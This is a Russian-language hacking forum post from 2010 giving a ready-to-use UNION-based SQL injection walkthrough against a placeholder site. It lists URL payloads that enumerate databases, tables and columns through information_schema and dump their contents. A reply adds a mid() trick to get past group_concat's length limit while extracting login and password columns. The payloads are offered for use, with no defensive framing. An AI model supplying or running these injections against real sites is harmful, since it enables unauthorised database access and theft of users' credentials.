|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Сообщение от Pashkela
Выложу и сюда, заманали уже просто с такими вопросами:
Узнаем все БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(schema_name),3,4,5, 6,7,8,9,10+from+information_schema.schemata--
Узнаем таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9,10+from+information_schema.tables+where+tab le_schema='ИМЯ_БД'--
Узнаем колонки из нужной таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10+from+information_schema.columns+where+t able_name='ИМЯ_ТАБЛИЦЫ'+and+table_schema ='ИМЯ_БД'--
Узнаем данные из нужной таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(ИМЯ_КОЛОНК И),3,4,5,6,7,8,9,10+from+ИМЯ_БД.ИМЯ_ТА ЛИЦЫ--
PS: или убрать group_concat и юзать как обычно:
limit+0,1
limit+1,1
......
если было чото такое - удалите плз, поиском по сайту в FAQ-ах вроде нет, а спрашивают часто
Такое маленькое дополнение) group_concat имеет ограничение выводимости данных в 1024 + limit он не поддерживает, что бы обойти его нужно использовать mid
К примеру вот так:
587955+union+select+1,2,3,4,5,mid(group_concat(log in,char(38),password),600,1024),7,8,9,10,11+from+ аза.Таблица--
Последний раз редактировалось CTAPu4OK; 22.05.2010 в 06:12..
|